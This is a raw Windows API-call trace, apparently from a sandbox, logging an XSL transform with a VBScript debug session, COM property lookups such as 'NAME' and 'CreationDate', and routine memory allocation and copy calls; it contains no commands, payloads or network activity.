[0406.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x60, lpConsoleScreenBufferInfo=0x16f0a0 | out: lpConsoleScreenBufferInfo=0x16f0a0) returned 0
[0406.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0406.712] GetFileType (hFile=0x60) returned 0x3
[0406.712] IXSLProcessor:transform (in: This=0x2139640, pDone=0x16f458 | out: pDone=0x16f458*=0xffff) returned 0x0
[0406.735] GetCurrentThreadId () returned 0xdf0
[0406.735] ??2@YAPEAX_K@Z () returned 0x20d7f0
[0406.735] ??2@YAPEAX_K@Z () returned 0x208740
[0406.735] GetCurrentThreadId () returned 0xdf0
[0406.735] ??2@YAPEAX_K@Z () returned 0x20d8c0
[0406.735] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0406.736] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x16eec0, cchData=6 | out: lpLCData="1252") returned 5
[0406.736] IsValidCodePage (CodePage=0x4e4) returned 1
[0406.736] DllRegisterServer () returned 0x0
[0406.736] CoCreateInstance (in: rclsid=0x7fef4b4d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef4b4d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x20e588 | out: ppv=0x20e588*=0x2d91c0) returned 0x0
[0406.737] IUnknown:AddRef (This=0x2d91c0) returned 0x2
[0406.737] GetCurrentProcessId () returned 0xdec
[0406.737] GetCurrentThreadId () returned 0xdf0
[0406.737] GetTickCount () returned 0x142f37e
[0406.737] ISystemDebugEventFire:BeginSession (This=0x2d91c0, guidSourceID=0x7fef4b4d5d8, strSessionName="VBScript:00003564:00003568:21164926") returned 0x0
[0406.737] GetCurrentThreadId () returned 0xdf0
[0406.737] ??2@YAPEAX_K@Z () returned 0x20d950
[0406.738] ??2@YAPEAX_K@Z () returned 0x209040
[0406.739] ??2@YAPEAX_K@Z () returned 0x20d9a0
[0406.739] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.742] malloc (_Size=0x988) returned 0x20e630
[0406.742] GetCurrentThreadId () returned 0xdf0
[0406.742] DllRegisterServer () returned 0x0
[0406.743] ??2@YAPEAX_K@Z () returned 0x20d9f0
[0406.779] ??2@YAPEAX_K@Z () returned 0x20efc0
[0406.779] malloc (_Size=0x80) returned 0x20f0c0
[0406.779] malloc (_Size=0x108) returned 0x20a900
[0406.779] memcpy (in: _Dst=0x20a948, _Src=0x35c468, _Size=0x1a | out: _Dst=0x20a948) returned 0x20a948
[0406.779] ??2@YAPEAX_K@Z () returned 0x20f150
[0406.780] memcpy (in: _Dst=0x20a9a8, _Src=0x35c48c, _Size=0xc | out: _Dst=0x20a9a8) returned 0x20a9a8
[0406.780] ??2@YAPEAX_K@Z () returned 0x20f1a0
[0406.780] malloc (_Size=0x208) returned 0x20f1f0
[0406.781] memcpy (in: _Dst=0x20f238, _Src=0x35c4a0, _Size=0x18 | out: _Dst=0x20f238) returned 0x20f238
[0406.781] ??2@YAPEAX_K@Z () returned 0x20f400
[0406.781] memcpy (in: _Dst=0x20f290, _Src=0x35c4c0, _Size=0x14 | out: _Dst=0x20f290) returned 0x20f290
[0406.781] ??2@YAPEAX_K@Z () returned 0x20f450
[0406.782] memcpy (in: _Dst=0x20f2e8, _Src=0x35c4dc, _Size=0x1c | out: _Dst=0x20f2e8) returned 0x20f2e8
[0406.782] ??2@YAPEAX_K@Z () returned 0x20f4a0
[0406.783] memcpy (in: _Dst=0x20f348, _Src=0x35c500, _Size=0x14 | out: _Dst=0x20f348) returned 0x20f348
[0406.783] GetCurrentThreadId () returned 0xdf0
[0406.783] memcpy (in: _Dst=0x20f3a0, _Src=0x35c51c, _Size=0xc | out: _Dst=0x20f3a0) returned 0x20f3a0
[0406.783] GetCurrentThreadId () returned 0xdf0
[0406.784] malloc (_Size=0x408) returned 0x20f4f0
[0406.784] memcpy (in: _Dst=0x20f538, _Src=0x35c530, _Size=0x12 | out: _Dst=0x20f538) returned 0x20f538
[0406.790] GetCurrentThreadId () returned 0xdf0
[0406.790] memcpy (in: _Dst=0x20f590, _Src=0x35c54c, _Size=0xe | out: _Dst=0x20f590) returned 0x20f590
[0406.791] GetCurrentThreadId () returned 0xdf0
[0406.791] memcpy (in: _Dst=0x20f5e0, _Src=0x35c564, _Size=0x6 | out: _Dst=0x20f5e0) returned 0x20f5e0
[0406.791] GetCurrentThreadId () returned 0xdf0
[0406.792] memcpy (in: _Dst=0x20f628, _Src=0x35c574, _Size=0xc | out: _Dst=0x20f628) returned 0x20f628
[0406.792] GetCurrentThreadId () returned 0xdf0
[0406.792] memcpy (in: _Dst=0x20f678, _Src=0x35c588, _Size=0x12 | out: _Dst=0x20f678) returned 0x20f678
[0406.792] GetCurrentThreadId () returned 0xdf0
[0406.793] memcpy (in: _Dst=0x20f6d0, _Src=0x35c5a4, _Size=0x14 | out: _Dst=0x20f6d0) returned 0x20f6d0
[0406.793] GetCurrentThreadId () returned 0xdf0
[0406.793] memcpy (in: _Dst=0x20f728, _Src=0x35c5c0, _Size=0xa | out: _Dst=0x20f728) returned 0x20f728
[0406.793] GetCurrentThreadId () returned 0xdf0
[0406.794] memcpy (in: _Dst=0x20f778, _Src=0x35c5d4, _Size=0x1a | out: _Dst=0x20f778) returned 0x20f778
[0406.794] ??2@YAPEAX_K@Z () returned 0x20f900
[0406.981] GetCurrentThreadId () returned 0xdf0
[0406.981] DllRegisterServer () returned 0x0
[0406.981] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.981] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.982] GetCurrentThreadId () returned 0xdf0
[0406.983] DllRegisterServer () returned 0x0
[0406.984] GetCurrentThreadId () returned 0xdf0
[0406.984] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0406.984] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0406.984] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0406.984] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0406.984] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.984] malloc (_Size=0x1008) returned 0x360440
[0406.985] ??2@YAPEAX_K@Z () returned 0x361450
[0406.985] malloc (_Size=0x2008) returned 0x3615e0
[0406.985] memcpy (in: _Dst=0x361614, _Src=0x2591a50, _Size=0x18 | out: _Dst=0x361614) returned 0x361614
[0406.985] malloc (_Size=0x108) returned 0x20aa10
[0406.985] memcpy (in: _Dst=0x361664, _Src=0x2591a6a, _Size=0x8 | out: _Dst=0x361664) returned 0x361664
[0406.985] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.985] malloc (_Size=0x208) returned 0x3635f0
[0406.986] malloc (_Size=0x40) returned 0x20d9a0
[0406.986] malloc (_Size=0x138) returned 0x20fe90
[0406.986] memcpy (in: _Dst=0x20fe90, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x20fe90) returned 0x20fe90
[0406.986] memcpy (in: _Dst=0x20fec8, _Src=0x361664, _Size=0xa | out: _Dst=0x20fec8) returned 0x20fec8
[0406.986] memcpy (in: _Dst=0x20fedc, _Src=0x361614, _Size=0x1a | out: _Dst=0x20fedc) returned 0x20fedc
[0406.986] memcpy (in: _Dst=0x20fef8, _Src=0x0, _Size=0x0 | out: _Dst=0x20fef8) returned 0x20fef8
[0406.986] memcpy (in: _Dst=0x20fef8, _Src=0x20d9a0, _Size=0x8 | out: _Dst=0x20fef8) returned 0x20fef8
[0406.986] memcpy (in: _Dst=0x20ff08, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x20ff08) returned 0x20ff08
[0406.986] memcpy (in: _Dst=0x20ff28, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x20ff28) returned 0x20ff28
[0406.986] memcpy (in: _Dst=0x20ff58, _Src=0x2591a50, _Size=0x24 | out: _Dst=0x20ff58) returned 0x20ff58
[0406.986] memcpy (in: _Dst=0x20ff80, _Src=0x363610, _Size=0x30 | out: _Dst=0x20ff80) returned 0x20ff80
[0406.987] memcpy (in: _Dst=0x20ffb0, _Src=0x36364c, _Size=0x13 | out: _Dst=0x20ffb0) returned 0x20ffb0
[0406.987] ??2@YAPEAX_K@Z () returned 0x2095a0
[0406.987] free (_Block=0x3615e0)
[0406.987] free (_Block=0x360440)
[0406.987] ??3@YAXPEAX@Z () returned 0x74007600820001
[0406.987] free (_Block=0x20d9a0)
[0406.987] free (_Block=0x3635f0)
[0406.989] free (_Block=0x20aa10)
[0406.989] ??2@YAPEAX_K@Z () returned 0x360440
[0406.989] realloc (_Block=0x209560, _Size=0x40) returned 0x20d9a0
[0406.989] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0406.990] ??2@YAPEAX_K@Z () returned 0x3604a0
[0406.991] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.991] GetCurrentThreadId () returned 0xdf0
[0406.991] DllRegisterServer () returned 0x0
[0406.992] memcpy (in: _Dst=0x20f7d8, _Src=0x20fec8, _Size=0xa | out: _Dst=0x20f7d8) returned 0x20f7d8
[0406.994] GetCurrentThreadId () returned 0xdf0
[0406.994] DllRegisterServer () returned 0x0
[0406.995] ??3@YAXPEAX@Z () returned 0x4d01
[0406.995] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.995] free (_Block=0x20fe90)
[0406.995] ??3@YAXPEAX@Z () returned 0x20016400580001
[0406.995] ??3@YAXPEAX@Z () returned 0x4d01
[0406.996] free (_Block=0x20fdc0)
[0406.996] GetCurrentThreadId () returned 0xdf0
[0406.996] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0406.996] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0406.997] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0406.997] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0406.997] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.997] malloc (_Size=0x1008) returned 0x360440
[0406.997] ??2@YAPEAX_K@Z () returned 0x361450
[0406.997] malloc (_Size=0x2008) returned 0x3615e0
[0406.997] memcpy (in: _Dst=0x361614, _Src=0x2591b20, _Size=0x16 | out: _Dst=0x361614) returned 0x361614
[0406.998] malloc (_Size=0x108) returned 0x20aa10
[0406.998] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.998] malloc (_Size=0x208) returned 0x3635f0
[0406.998] malloc (_Size=0x40) returned 0x20fe90
[0406.998] malloc (_Size=0x110) returned 0x361450
[0406.998] memcpy (in: _Dst=0x361450, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361450) returned 0x361450
[0406.998] memcpy (in: _Dst=0x361488, _Src=0x361614, _Size=0x18 | out: _Dst=0x361488) returned 0x361488
[0406.998] memcpy (in: _Dst=0x3614a0, _Src=0x0, _Size=0x0 | out: _Dst=0x3614a0) returned 0x3614a0
[0406.998] memcpy (in: _Dst=0x3614a0, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x3614a0) returned 0x3614a0
[0406.998] memcpy (in: _Dst=0x3614b0, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x3614b0) returned 0x3614b0
[0406.998] memcpy (in: _Dst=0x3614d0, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x3614d0) returned 0x3614d0
[0406.999] memcpy (in: _Dst=0x361500, _Src=0x2591b20, _Size=0x1a | out: _Dst=0x361500) returned 0x361500
[0406.999] memcpy (in: _Dst=0x361520, _Src=0x363610, _Size=0x30 | out: _Dst=0x361520) returned 0x361520
[0406.999] memcpy (in: _Dst=0x361550, _Src=0x36364c, _Size=0xe | out: _Dst=0x361550) returned 0x361550
[0406.999] ??2@YAPEAX_K@Z () returned 0x2095a0
[0406.999] free (_Block=0x3615e0)
[0406.999] free (_Block=0x360440)
[0406.999] ??3@YAXPEAX@Z () returned 0x74007700820001
[0406.999] free (_Block=0x20fe90)
[0406.999] free (_Block=0x3635f0)
[0406.999] free (_Block=0x20aa10)
[0406.999] ??2@YAPEAX_K@Z () returned 0x20fe90
[0406.999] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.000] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.001] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.001] GetCurrentThreadId () returned 0xdf0
[0407.001] DllRegisterServer () returned 0x0
[0407.003] GetCurrentThreadId () returned 0xdf0
[0407.003] DllRegisterServer () returned 0x0
[0407.003] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.003] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.003] free (_Block=0x361450)
[0407.004] ??3@YAXPEAX@Z () returned 0x20016500580001
[0407.004] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.004] free (_Block=0x20fdc0)
[0407.004] GetCurrentThreadId () returned 0xdf0
[0407.004] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0407.004] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0407.004] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0407.004] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0407.005] ??2@YAPEAX_K@Z () returned 0x2087c0
[0407.005] malloc (_Size=0x1008) returned 0x360440
[0407.005] ??2@YAPEAX_K@Z () returned 0x361450
[0407.005] malloc (_Size=0x2008) returned 0x3615e0
[0407.005] memcpy (in: _Dst=0x361614, _Src=0x2591cd0, _Size=0x12 | out: _Dst=0x361614) returned 0x361614
[0407.005] malloc (_Size=0x108) returned 0x20aa10
[0407.005] memcpy (in: _Dst=0x36165c, _Src=0x2591ce4, _Size=0x8 | out: _Dst=0x36165c) returned 0x36165c
[0407.005] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.005] malloc (_Size=0x208) returned 0x3635f0
[0407.006] malloc (_Size=0x40) returned 0x20fe90
[0407.006] malloc (_Size=0x128) returned 0x361450
[0407.006] memcpy (in: _Dst=0x361450, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361450) returned 0x361450
[0407.006] memcpy (in: _Dst=0x361488, _Src=0x36165c, _Size=0xa | out: _Dst=0x361488) returned 0x361488
[0407.006] memcpy (in: _Dst=0x36149c, _Src=0x361614, _Size=0x14 | out: _Dst=0x36149c) returned 0x36149c
[0407.006] memcpy (in: _Dst=0x3614b0, _Src=0x0, _Size=0x0 | out: _Dst=0x3614b0) returned 0x3614b0
[0407.006] memcpy (in: _Dst=0x3614b0, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x3614b0) returned 0x3614b0
[0407.006] memcpy (in: _Dst=0x3614c0, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x3614c0) returned 0x3614c0
[0407.006] memcpy (in: _Dst=0x3614e0, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x3614e0) returned 0x3614e0
[0407.006] memcpy (in: _Dst=0x361510, _Src=0x2591cd0, _Size=0x1e | out: _Dst=0x361510) returned 0x361510
[0407.006] memcpy (in: _Dst=0x361530, _Src=0x363610, _Size=0x30 | out: _Dst=0x361530) returned 0x361530
[0407.007] memcpy (in: _Dst=0x361560, _Src=0x36364c, _Size=0x13 | out: _Dst=0x361560) returned 0x361560
[0407.007] ??2@YAPEAX_K@Z () returned 0x2095a0
[0407.007] free (_Block=0x3615e0)
[0407.007] free (_Block=0x360440)
[0407.007] ??3@YAXPEAX@Z () returned 0x74007800820001
[0407.007] free (_Block=0x20fe90)
[0407.007] free (_Block=0x3635f0)
[0407.007] free (_Block=0x20aa10)
[0407.007] ??2@YAPEAX_K@Z () returned 0x20fe90
[0407.007] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.008] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.008] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.009] GetCurrentThreadId () returned 0xdf0
[0407.009] DllRegisterServer () returned 0x0
[0407.011] IUnknown:QueryInterface (in: This=0x21357c0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db40 | out: ppvObject=0x16db40*=0x21357f0) returned 0x0
[0407.012] IUnknown:Release (This=0x21357c0) returned 0x1
[0407.012] IUnknown:QueryInterface (in: This=0x21357f0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16de40 | out: ppvObject=0x16de40*=0x21357f0) returned 0x0
[0407.012] IDispatchEx:GetDispId (in: This=0x21357f0, bstrName="GetNamedItem", grfdex=0x8, pid=0x16dda8 | out: pid=0x16dda8*=83) returned 0x0
[0407.012] IUnknown:Release (This=0x21357f0) returned 0x1
[0407.012] IUnknown:AddRef (This=0x21357f0) returned 0x2
[0407.012] IUnknown:QueryInterface (in: This=0x21357f0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db30 | out: ppvObject=0x16db30*=0x21357f0) returned 0x0
[0407.012] ??2@YAPEAX_K@Z () returned 0x20ff40
[0407.013] IDispatchEx:InvokeEx (in: This=0x21357f0, id=83, lcid=0x409, wFlags=0x3, pdp=0x16db08*(rgvarg=([0]=0x20ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0x16dd48, pei=0x16db50, pspCaller=0x20ff40 | out: pdp=0x16db08*(rgvarg=([0]=0x20ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0x16dd48*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x213a280, varVal2=0x0), pei=0x16db50*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0407.013] IUnknown:Release (This=0x21357f0) returned 0x2
[0407.013] IUnknown:Release (This=0x21357f0) returned 0x1
[0407.013] IUnknown:QueryInterface (in: This=0x213a280, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db40 | out: ppvObject=0x16db40*=0x213a2b0) returned 0x0
[0407.014] IUnknown:Release (This=0x213a280) returned 0x1
[0407.014] IUnknown:QueryInterface (in: This=0x213a2b0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16de58 | out: ppvObject=0x16de58*=0x213a2b0) returned 0x0
[0407.014] IDispatchEx:GetDispId (in: This=0x213a2b0, bstrName="Value", grfdex=0x8, pid=0x16ddac | out: pid=0x16ddac*=120) returned 0x0
[0407.014] IUnknown:Release (This=0x213a2b0) returned 0x1
[0407.015] IUnknown:AddRef (This=0x213a2b0) returned 0x2
[0407.015] IUnknown:QueryInterface (in: This=0x213a2b0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db30 | out: ppvObject=0x16db30*=0x213a2b0) returned 0x0
[0407.015] IDispatchEx:InvokeEx (in: This=0x213a2b0, id=120, lcid=0x409, wFlags=0x3, pdp=0x16db08*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x20ece8, pei=0x16db50, pspCaller=0x20ff40 | out: pdp=0x16db08*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate", varVal2=0x0), pei=0x16db50*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0407.015] IUnknown:Release (This=0x213a2b0) returned 0x2
[0407.015] IUnknown:Release (This=0x213a2b0) returned 0x1
[0407.021] memcpy (in: _Dst=0x20f828, _Src=0x7fef4b61978, _Size=0x10 | out: _Dst=0x20f828) returned 0x20f828
[0407.021] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Array", cchCount2=14) returned 1
[0407.023] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Reference", cchCount2=18) returned 1
[0407.024] memcpy (in: _Dst=0x20f878, _Src=0x7fef4b63a60, _Size=0xa | out: _Dst=0x20f878) returned 0x20f878
[0407.024] memcpy (in: _Dst=0x20f8c8, _Src=0x7fef4b62208, _Size=0x10 | out: _Dst=0x20f8c8) returned 0x20f8c8
[0407.026] memcpy (in: _Dst=0x2c6228, _Src=0x2c6958, _Size=0x32 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.026] malloc (_Size=0x808) returned 0x360440
[0407.026] memcpy (in: _Dst=0x360488, _Src=0x7fef4b63b10, _Size=0xa | out: _Dst=0x360488) returned 0x360488
[0407.026] memcpy (in: _Dst=0x304c58, _Src=0x2c6958, _Size=0x32 | out: _Dst=0x304c58) returned 0x304c58
[0407.027] GetCurrentThreadId () returned 0xdf0
[0407.027] DllRegisterServer () returned 0x0
[0407.028] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.028] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.028] free (_Block=0x361450)
[0407.028] ??3@YAXPEAX@Z () returned 0x20016600580001
[0407.028] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.029] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.029] free (_Block=0x20fdc0)
[0407.029] GetCurrentThreadId () returned 0xdf0
[0407.029] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0407.029] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0407.029] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0407.029] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0407.029] ??2@YAPEAX_K@Z () returned 0x2087c0
[0407.030] malloc (_Size=0x1008) returned 0x360c50
[0407.030] ??2@YAPEAX_K@Z () returned 0x361c60
[0407.030] malloc (_Size=0x2008) returned 0x361df0
[0407.030] memcpy (in: _Dst=0x361e24, _Src=0x2591960, _Size=0x1a | out: _Dst=0x361e24) returned 0x361e24
[0407.030] malloc (_Size=0x108) returned 0x20aa10
[0407.030] memcpy (in: _Dst=0x361e74, _Src=0x259197c, _Size=0x8 | out: _Dst=0x361e74) returned 0x361e74
[0407.030] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.030] malloc (_Size=0x208) returned 0x363e00
[0407.031] malloc (_Size=0x40) returned 0x20fe90
[0407.031] malloc (_Size=0x138) returned 0x361c60
[0407.031] memcpy (in: _Dst=0x361c60, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361c60) returned 0x361c60
[0407.031] memcpy (in: _Dst=0x361c98, _Src=0x361e74, _Size=0xa | out: _Dst=0x361c98) returned 0x361c98
[0407.031] memcpy (in: _Dst=0x361cac, _Src=0x361e24, _Size=0x1c | out: _Dst=0x361cac) returned 0x361cac
[0407.031] memcpy (in: _Dst=0x361cc8, _Src=0x0, _Size=0x0 | out: _Dst=0x361cc8) returned 0x361cc8
[0407.031] memcpy (in: _Dst=0x361cc8, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x361cc8) returned 0x361cc8
[0407.031] memcpy (in: _Dst=0x361cd8, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x361cd8) returned 0x361cd8
[0407.032] memcpy (in: _Dst=0x361cf8, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x361cf8) returned 0x361cf8
[0407.032] memcpy (in: _Dst=0x361d28, _Src=0x2591960, _Size=0x26 | out: _Dst=0x361d28) returned 0x361d28
[0407.032] memcpy (in: _Dst=0x361d50, _Src=0x363e20, _Size=0x30 | out: _Dst=0x361d50) returned 0x361d50
[0407.032] memcpy (in: _Dst=0x361d80, _Src=0x363e5c, _Size=0x13 | out: _Dst=0x361d80) returned 0x361d80
[0407.032] ??2@YAPEAX_K@Z () returned 0x2095a0
[0407.032] free (_Block=0x361df0)
[0407.032] free (_Block=0x360c50)
[0407.032] ??3@YAXPEAX@Z () returned 0x74007900820001
[0407.032] free (_Block=0x20fe90)
[0407.032] free (_Block=0x363e00)
[0407.032] free (_Block=0x20aa10)
[0407.032] ??2@YAPEAX_K@Z () returned 0x20fe90
[0407.033] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.033] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.033] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.034] GetCurrentThreadId () returned 0xdf0
[0407.034] DllRegisterServer () returned 0x0
[0407.036] realloc (_Block=0x0, _Size=0x140) returned 0x360c50
[0407.036] memcpy (in: _Dst=0x360c50, _Src=0x20f010, _Size=0xa0 | out: _Dst=0x360c50) returned 0x360c50
[0407.036] memcpy (in: _Dst=0x3604d8, _Src=0x7fef4b60398, _Size=0x8 | out: _Dst=0x3604d8) returned 0x3604d8
[0407.036] memcpy (in: _Dst=0x360520, _Src=0x7fef4b603f0, _Size=0x8 | out: _Dst=0x360520) returned 0x360520
[0407.036] memcpy (in: _Dst=0x334ca8, _Src=0x2c68b8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.037] memcpy (in: _Dst=0x360568, _Src=0x7fef4b61c40, _Size=0xa | out: _Dst=0x360568) returned 0x360568
[0407.037] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ba, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.037] memcpy (in: _Dst=0x334ca8, _Src=0x2c68bc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.038] memcpy (in: _Dst=0x334ca8, _Src=0x2c68be, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.038] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c0, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.039] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c2, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.039] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c4, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c6, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.040] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ca, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.041] memcpy (in: _Dst=0x334ca8, _Src=0x2c68cc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
